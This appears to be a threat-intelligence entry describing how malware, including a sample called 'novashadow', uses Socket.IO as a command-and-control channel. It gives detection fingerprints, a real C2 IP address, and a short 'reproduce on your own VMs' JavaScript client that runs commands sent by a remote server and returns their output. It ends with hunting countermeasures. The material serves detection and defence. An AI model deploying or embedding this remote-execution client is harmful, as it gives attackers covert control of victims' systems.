Socket.IO C2 Transport
Malware uses the Socket.IO library to establish a persistent, bidirectional, event-driven WebSocket-over-HTTP C2 channel. Events are used to issue commands (client-execute-command), transfer files (file-chunk, file-complete), and stream screen captures in real time.
Detection / Fingerprint
- Hardcoded
socket.io-clientstring in JavaScript source - HTTP traffic with Socket.IO handshake (
EIO=,transport=pollingupgrade towebsocket) emit()andon()patterns with event names likejoin-message,ping-room,pong-room- Query parameters carrying attacker/session IDs (e.g.,
query.attackerId)
Implementation Patterns Observed
In novashadow the client connects to http://144.172.93.158 with attackerId in the query object, then listens for:
connect→ emitsjoin-messageclient-execute-command→ spawns PowerShell and streams output viacommand-outputstart-screen-sharing/stop-screen-sharing→ toggles desktop capture
Reproduce on Your Own VMs
- Install Node.js and
socket.io-client - Build a minimal client:
const io = require('socket.io-client'); const socket = io('http://your-server', { query: { attackerId: 'test' }}); socket.on('client-execute-command', cmd => { const { exec } = require('child_process'); exec(cmd, (e, out) => socket.emit('command-output', { out })); }); - Pair with a Socket.IO server running on your C2 host
Defensive Countermeasures
- Monitor for
socket.io-clientin process command lines or loaded modules - Alert on WebSocket upgrade traffic to non-standard ports without SNI
- Hunt for JavaScript files containing both
socket.io-clientandchild_process.exec